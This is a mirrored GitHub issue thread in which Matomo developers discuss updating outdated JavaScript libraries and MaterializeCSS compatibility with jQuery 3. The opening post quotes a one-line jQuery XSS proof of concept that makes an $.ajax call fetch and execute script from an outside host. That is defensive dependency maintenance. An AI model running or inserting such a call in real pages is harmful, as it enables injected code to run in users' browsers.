@Findus23 opened this Issue on May 23rd 2018 Member

I know this is a tedious task with no direct benefit, but the possibility of breaking some things.

But most JS libraries haven't been updated since Piwik 3 in 2016. And since then many things changed, new browsers appeared and security issues were found.

One of the largest that (kind of) affects Matomo is https://nodesecurity.io/advisories/328 which affects all jQuery versions <3.0.0
Simply said running

$.ajax('http://sakurity.com/jqueryxss')

in Matomo executes the JavaScript at http://sakurity.com/jqueryxss.
Thankfully @sgiehl had the great foresight 6 years ago when creating the ajaxhelper (in https://github.com/matomo-org/matomo/commit/99793151cd6d4f318b7a011509bd421685f0537a) to fallback to "json" as a format, so I think Matomo isn't affected.

But I still think that updating JS regularly will avoid possible future issues.

(The same can be said for composer dependencies, but thanks to the new npm audit command, checking for security issues in frontend libraries was easier)
Update: It seems like https://packagist.org/packages/roave/security-advisories is something similar for php dependencies

@tsteur commented on May 23rd 2018 Member

Just FYI: MaterializeCSS is not compatible with jQuery 3+ in case it was planned to update to a newer jquery major version.

@Findus23 commented on May 23rd 2018 Member

@tsteur It seems like the fix has already been merged a year ago and will be released soon:
https://github.com/Dogfalo/materialize/issues/3201

But I wouldn't be surprised if a lot of other things stop working.

@tsteur commented on May 23rd 2018 Member

@Findus23 that will be in MaterializeCSS 1.0 but we are likely not compatible with that version and may need to update a bit of code and plugins to make that work (to be tested). Just saying we may not be easily able to upgrade to that version and only as part of Matomo 4.0 as it may hard for plugins to keep them compatible with 0.X version and 1.X version of MaterializeCSS etc. But maybe it is not really an issue, it is just a matter of testing and see how much we need to change and what. Most of the logic is centralized so it might not be too bad.

@Findus23 commented on October 12th 2018 Member

BTW: MaterializeCSS 1.0 just came out.

Powered by GitHub Issue Mirror